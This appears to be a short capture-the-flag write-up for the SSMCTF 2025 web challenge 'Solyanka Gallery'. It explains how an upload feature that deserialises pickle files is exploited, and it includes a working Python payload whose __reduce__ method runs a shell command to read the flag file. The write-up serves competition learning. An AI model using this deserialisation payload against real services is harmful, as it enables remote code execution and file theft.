SSMCTF 2025 | Solyanka Gallery

Published on: July 19, 2025

2 min read · Posted by jeff_160

Challenge Details

Description

Category

Web Exploitation

Difficulty

Medium

Topics

Competition

SSMCTF 2025

Author

jeff_160

Writeup created for the 2025 SSMCTF Writeup Competition

Writeup

solyanka gallery

Category: Web
Difficulty: Medium

challenge

In the challenge website, we are allowed to submit a pickle file, which will be deserialised and displayed.

website
source

The flag file is also in the same directory as the server code.

dockerfile

Looking at the source code, we can see that the challenge author has left us a hint.

hint

Searching online, we discover that a RCE exploit of Pickle's deserialisation already exists.

We can then write an exploit script to create a pickle file that outputs the flag file on deserialisation.

import pickle
import subprocess

class Exploit:
    def __reduce__(self):
        return (subprocess.check_output, (['cat', 'flag.txt'],))

payload = pickle.dumps(Exploit())

with open("payload.pkl", "wb") as f:
    f.write(payload)

After submitting the payload file on the website, we observe that the RCE has indeed revealed the flag.

flag

Please login to comment

Comments

No comments yet